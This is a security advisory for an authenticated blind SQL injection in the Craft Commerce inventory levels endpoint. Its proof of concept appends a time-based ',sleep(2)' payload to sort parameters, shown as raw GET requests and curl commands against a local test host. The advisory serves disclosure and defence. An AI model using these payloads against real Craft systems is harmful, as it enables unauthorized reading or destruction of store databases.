PT-2026-24633 · Packagist · Craftcms/Commerce
Published
2026-03-10
·
Updated
2026-03-10
CVSS v4.0
8.7
High
| Vector | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
Summary
Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The
sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise.PoC
Required Permissions
- General
- Access the control panel
- Access Craft Commerce
- Craft Commerce
- Manage inventory stock levels
Steps to reproduce
- Log in to the control panel
- Navigate to Commerce > Inventory
- Click on any sortable column header (e.g., "SKU") to trigger a sort request
- Intercept the request and modify
sort[0][direction]orsort[0][sortField]parameters and append,sleep(2)payload to it's current value as follows:
# sort[0][sortField]=sku,sleep(2)
GET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku,sleep(2)&sort[0][direction]=asc&inventoryLocationId=1&containerId=%23inventory-levels
# sort[0][direction]=asc,sleep(2)
GET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku&sort[0][direction]=asc,sleep(2)&inventoryLocationId=1&containerId=%23inventory-levels- Observe the delay in the response, confirming the injection
Alternatively, you can use the following
curl (bash syntax) command (replace cookie and target domain as needed):# sort[0][sortField]=sku,sleep(2)
curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku,sleep(2)&sort%5b0%5d%5bdirection%5d=asc&page=1&per page=25&inventoryLocationId=1&containerId=%23inventory-levels'
# sort[0][direction]=asc,sleep(2)
curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku&sort%5b0%5d%5bdirection%5d=asc,sleep(2)&page=1&per page=25&inventoryLocationId=1&containerId=%23inventory-levels'Impact
With this Blind SQLi, an attacker can:
- Exfiltrate data character-by-character using time-based techniques.
- Modify or destroy data (drop tables, update records, alter schema).
Fix
SQL injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Craftcms/Commerce